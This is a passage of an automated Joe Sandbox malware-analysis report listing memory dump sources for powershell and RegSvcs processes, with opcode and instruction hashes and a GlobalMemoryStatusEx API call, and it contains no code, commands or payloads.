                                            • Source File: 00000001.00000002.1476678104.00007FFB4B460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B460000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffb4b460000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1db1e6ef91b3dd467bd51f2a68eab19269f856fc946f40a60937643cda07f60e
                                            • Instruction ID: 40328c81c38f71f8cfaef299eb359def361218503aceb00326f2f3ee157ece05
                                            • Opcode Fuzzy Hash: 1db1e6ef91b3dd467bd51f2a68eab19269f856fc946f40a60937643cda07f60e
                                            • Instruction Fuzzy Hash: 90F02452F0D9D90BFBE9BA7C64062F96BC1DF45621B0885BADA8DC3243DC0C9C2543C1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1475679368.00007FFB4B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffb4b390000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: df32c89e29bb800c469fdb8f875865b77258d8e1cf8bc716b528746609c96d56
                                            • Instruction ID: f530faee17b7980421ca72401808183fd49ac9f968ac0a6c68111b2594f8a5ab
                                            • Opcode Fuzzy Hash: df32c89e29bb800c469fdb8f875865b77258d8e1cf8bc716b528746609c96d56
                                            • Instruction Fuzzy Hash: F1F017B4E0821A8FEB54EFA9C6816BFB7F1EB54311F108669D105E7254DB38AA408B90
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1475679368.00007FFB4B390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffb4b390000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c99602ede571d9b5687628fb827da87e4e5eca8e9fc30cadfba269893e912382
                                            • Instruction ID: 71ebe79ba0acf9eb79a2e8fd89806a6aeabda192f6cac10a350df7a09461382c
                                            • Opcode Fuzzy Hash: c99602ede571d9b5687628fb827da87e4e5eca8e9fc30cadfba269893e912382
                                            • Instruction Fuzzy Hash: 56E0B66094555B9FD7A1EF28C8197A9B6E1AF04200F0040FA840DD76A2EE341DC99B40

                                            Executed Functions

                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0149811A), ref: 01498207
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3882735121.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1490000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: 9b9d25a485172600ebafed066f64626420b4a7d67c0cdb62b0ffe0b3e232370f
                                            • Instruction ID: db38a300cd28e9dbffb9fb7f29573e51cb445f3c37e44280daac453188f50ad8
                                            • Opcode Fuzzy Hash: 9b9d25a485172600ebafed066f64626420b4a7d67c0cdb62b0ffe0b3e232370f
                                            • Instruction Fuzzy Hash: 751100B1C0065ADBDB14CF9AC444B9EFBF4AB48220F24816AE818A7251D378A941CFA5
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0149811A), ref: 01498207
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3882735121.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1490000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: e76dada379aa1509142a6c821065b9ea4f6ecc6b62659f8984fa66b7aa8b19ee
                                            • Instruction ID: f546db0f08139e2cf7b779e9f079044be475b614f184dcc7d12c30b34fcc7de3
                                            • Opcode Fuzzy Hash: e76dada379aa1509142a6c821065b9ea4f6ecc6b62659f8984fa66b7aa8b19ee
                                            • Instruction Fuzzy Hash: 4511D0B1C0065ADFDB14CFAAD444BDEFBF4AB48210F15826AD818A7241D378A945CFA5